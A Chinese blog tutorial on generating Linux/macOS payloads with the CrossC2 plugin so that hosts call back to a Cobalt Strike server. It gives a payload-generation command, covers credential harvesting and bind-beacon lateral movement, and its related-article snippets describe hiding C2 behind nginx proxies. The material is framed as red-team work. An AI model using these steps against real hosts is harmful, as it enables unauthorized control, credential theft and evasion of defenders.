cobaltstrike安装_CobaltStrike使用CrossC2上线linux

最新推荐文章于 2024-06-01 09:51:40 发布
最新推荐文章于 2024-06-01 09:51:40 发布
阅读量1.8k 收藏 1
点赞数
文章标签: cobaltstrike安装

    这是一篇宠粉向的文章,做公众号这么久了,经常会收到很多人的留言,看到自己的文章能帮助到别人,是一件很开心的事情。

395f2654afa0752cfa86d7ebf0e727d3.png

最近有朋友提出来了上线的问题,于是水文一篇,聊聊这个话题。

3b3b0b9c9bea136d7ca273d773df0c28.png

CrossC2是什么?

面向企业自身及红队人员的安全评估框架,支持CobaltStrike对其他平台(Linux/MacOS/...)的安全评估,支持自定义模块,及包含一些常用的渗透模块。其开源地址为https://github.com/gloxec/CrossC2。官方文档地址为:https://gloxec.github.io/CrossC2/zh_cn/

如果需要使用的话,我们需要下载主文件CrossC2.cna、genCrossC2.Linux (如果操作系统是Windows, 下载genCrossC2.Win.exe).然后CS安装脚本文件,并在脚本文件中设置genCrossC2.Linux的路径。

$CC2_PATH = "/xxx/xx/xx"; # $CC2_BIN = "/genCrossC2.Linux";

安装后,主界面显示CrossC2

5ffed470d296da08bc7238b830f2e869.png

目前的话该工具因为一些原因,目前强制只支持HTTPS beacon。若不使用CobaltSteike直接生成载荷,需要将.cobaltstrike.beacon_keys复制到本地目录下,便可以使用genCrossC2.Linux 生成载荷。

c7e0f81b72fe318b11f7012c4d14410d.png

如果是4.1版本的CS,请使用4.1分支https://github.com/gloxec/CrossC2/tree/cs4.1/src 其作者还提供了一套工具包进行辅助使用,工具包地址为https://github.com/gloxec/CrossC2/tree/master/CrossC2Kit

下面来演示使用该插件进行上线linux

首先开启一个https的监听,然后使用gui进行生成

fac69da6df3d6ecb0f692efa351ed23d.png

依次填入需要填写的内容即可,注意选择Stageless,否则生成的为一串shellcode

命令行生成:

./genCrossC2.Linux ip port ./.cobaltstrike.beacon_keys null Linux x64 /tmp/CrossC2-test

8c216ed6966b6b4eff362c48c32901b1.png

运行生成的文件,获取session

a4cabd9b9f70203b263a4d57faf0d44b.png

执行命令

052f08f479d22715f4650b9acb29eef0.png

插件提供了丰富的功能

efb2094bdd8377434737124f57816b92.png

使用插件的文件管理功能

0273d508973f228e52c66ebd433d8a9c.png

凭据获取

1aa529f13dfd822d7bd1cd8a942000c4.png

运行py 脚本,直接内存

python import base64;print base64.b64encode('whoami'); print 'a'*40

8dc8500a3d79531531c6a29d2fc97f2f.png

使用bind进行横向移动,

生成 Linux-bind / MacOS-bind 类型的beacon内网中的目标运行 ./MacOS-bind.beacon <port> 开启服务在网络联通的session中运行 connect <targetIP>:<port>

179ffba66f728df5fdaf8688c99e435c.png

weixin_39914863
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Cobalt-Strike-4.7
12-27
Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后...
Cobalt_Strike_C2隐匿多级nginx反向代理1
08-03
Cobalt Strike 是一种广泛使用的红队工具,它提供了多种功能,包括建立 C2 通道、执行命令、收集信息等。在本文中,我们将讨论如何利用多级 Nginx 反向代理来隐藏 C2 通信,提高隐蔽性。 首先,我们要了解 Nginx ...
cobaltstrike安装_Cobalt Strike使用Cross C2上线Linux
weixin_39812046的博客
11-30 944
0x01前言Cross C2是一个支持Linux & MacOS系统的拓展插件,支持用户自定义生成的动态库,以无文件落地的方式从内存中加载执行动态库或可执行文件,可做一些简单的操作,记录一下使用过程中遇到的一些小问题。Cross c2支持架构说明:0x02 创建监听器Cross C2目前只支持HTTPS Beacon,所以在Listenrs中选择HTTPS进行监听Cobalt ...
通过CrossC2上线CS踩坑记(Linux)
ATpiu的博客
08-07 4867
Linux下,通过CrossC2上线CS,自定义profile
探索CrossC2 Kit:Unix平台的后渗透利器
最新发布
gitblog_00055的博客
06-01 393
探索CrossC2 Kit:Unix平台的后渗透利器 项目地址:https://gitcode.com/CrossC2/CrossC2Kit 项目介绍 欢迎来到CrossC2 Kit的世界,这是一个专为Unix平台设计的后渗透扩展工具,基于强大的Aggressor Script脚本引擎。CrossC2 Kit的设计旨在模拟真实的红队操作,并且能够扩展CobaltStrike客户端的功能。它的核心是...
Cobalt Strike(cs)配合插件CrossC2,实现linux上线
m0_61867082的博客
06-26 3016
Cobalt Strike(cs)配合插件CrossC2,实现linux上线
使用CrossC2插件 上线Linux
Vicl1fe的博客
08-12 2043
前言 做红队的时候,就可以发现大部分服务器都是linux。而Windows的服务器比较少。还是更希望可以上线CS,方便管理。 环境 1.kali 2021 2.CS4.2 CrossC2 通过CrossC2插件可以实现上线CS。支持CS4.x版本上线,github链接如下。 https://github.com/gloxec/CrossC2/releases 我下载的是2.2.4-stable。因为我的环境是kali。所以我下载的是genCrossC2.Linux。然后再把Source code(zip
Cobalt Strike 4.0 dist_Strike!_Cobalt_cobaltstrike_
10-02
_Cobalt_cobaltstrike_"这部分描述可能暗示了分发策略的改进。Cobalt Strike的分发通常涉及将攻击载体(如钓鱼邮件或exploit kits)部署到目标环境中。4.0可能引入了更灵活的载体生成工具,支持更多的文件格式和...
CrossC2:生成CobaltStrike的跨平台有效负载
02-03
2. **CrossC2** 是一个工具,能够生成跨平台的Cobalt Strike有效负载,这意味着它可以在多个操作系统上运行,包括 **Android**,**macOS**,**Linux** 和 **iOS**。 3. **Red Team** 活动是安全测试的一种形式,通过...
CobaltStrike4.4.zip
09-15
`update.bat`通常用于更新Cobalt Strike到最新版本,确保使用者始终能够利用最新的特性和修复。 `.cobaltstrike.beacon_keys`文件可能包含Cobalt Strike Beacon的密钥,Beacon是Cobalt Strike的代理组件,它在目标...
genCrossC2.Linux
07-24
genCrossC2.Linux
【渗透测试】Cobalt Strike 插件 CrossC2(v3.0.2) 安装使用
SunnyCat
02-09 1万+
目录一、起因二、安装1)客户端配置2)vps服务端操作3)客户端cs操作三、上线1)二进制木马文件上线2)命令行上线 一、起因 cobaltstike默认只生成windows载荷,不能上线linux主机,想上线linux主机需要通过ssh回话的方式,CrossC2可以通过生成linux载荷直接上线linux主机(或Mac) 项目地址:https://github.com/gloxec/CrossC2/ 参考地址:https://gloxec.github.io/CrossC2/zh_cn/ 二、安装 需要准
Cobalt Strike 插件CrossC2(小白教程)
m0_63239459的博客
03-10 1822
cobaltstrike插件加载crossc2
CobaltStrike在Windows环境上线Linux主机
weixin_50618290的博客
11-11 4168
查阅了很多教程都没有发现纯Windows下面直接上线LINUX主机的方法,都是完全拷贝到Linux上面命令生成,这里记录一下本人的学习历程,大佬请飘过。 首先下载CrossC2,项目地址:GitHub - gloxec/CrossC2: generate CobaltStrike's cross-platform payload 在9天前更新过(今天2021年11月11日),下载后直接加载CS,成功后会有一个标题栏: 然后Windows下面启用CS: 创建监听器,这里的第一个坑来了:如果用默认44.
黑客必备利器:如何在系统上安装使用 CobaltStrike(简称:CS)
热门推荐
weixin_43263566的博客
01-11 1万+
渗透测试之基本的攻击流程
CobaltStrikeLinux上线笔记 (CrossC2插件使用
box
03-03 1万+
CobaltStrike 默认是不支持Linux上线,有一款插件解决了一个问题。就是GitHub的一个项目——CrossC2,以下就介绍一下这款插件的配置和使用。 一、插件配置 项目地址:https://github.com/gloxec/CrossC2 将这两个文件下载下来,创建一个文件夹,并放置文件夹下 修改 CrossC2-GithubBot-2021-11-02.cna 修改**$CC2_PATH**为真实路径,对应本地存放的CrossC2路径。注意最后的 / 修改$CC2_BIN 为pay
关于CS上线Linux主机(CrossC2
Adminxe的博客
07-11 2548
0x01 前言 Cross C2是一个支持Linux & MacOS系统的拓展插件,支持用户自定义生成的动态库,以无文件落地的方式从内存中加载执行动态库或可执行文件。用法我的想法来说,相当于一个小集群,插件化方便利用,实际的渗透中意义并不大,更加实际于命令行渗透,做到无文件落地,过流量检测加密免杀等技术的研究。 简而言之:一个CS的简单小插件,目的就是上线Linux主机, 可做一些简单的操作,记录一下使用过程中遇到的一些问题,并且在使用中操作的正确性。 Cross c2支持架构说明: ..
Cobalt_Strike_4.5渗透工具的安装使用
天道酬勤
04-14 4023
Cobalt_Strike安装使用
cobalt_strike_c2隐匿多级nginx反向代理
10-17
Cobalt Strike C2 是一个常用的网络攻击工具,用于进行渗透测试和红队行动。为了更好地隐藏自身并增加隐匿性,Cobalt Strike C2 可以通过多级 NGINX 反向代理来进行隐匿。 NGINX 是一个高性能、开源的 Web 服务器和反向代理服务器。使用 NGINX 反向代理可以隐藏 Cobalt Strike C2 服务器的真实 IP 地址,提高其匿名性和免受检测的能力。 多级 NGINX 反向代理是指将一级代理服务器的请求再转发到二级代理服务器,二级代理服务器再将请求转发到 C2 服务器。这样,攻击者可以在多个层次上混淆和隐藏自己的真实 IP 地址,增加对手的追踪难度。 在这个过程中,每一级代理服务器都可以对进出的数据进行进一步的加密和解密,即使被探测到,攻击者也难以解密出真实的数据内容。 通过使用多级 NGINX 反向代理,Cobalt Strike C2 可以在网络上更为隐匿地进行通信,减少被检测和追踪的风险。同时,这种架构还可以提高系统的可扩展性和负载均衡能力,提高对抗DDoS等攻击的能力。 需要注意的是,虽然多级 NGINX 反向代理可以提高 Cobalt Strike C2 的隐匿性,但对于有经验的网络安全人员来说,仍然可以通过其他手段进行识别和检测,因此在实际应用中,还需要结合其他安全措施来提高系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值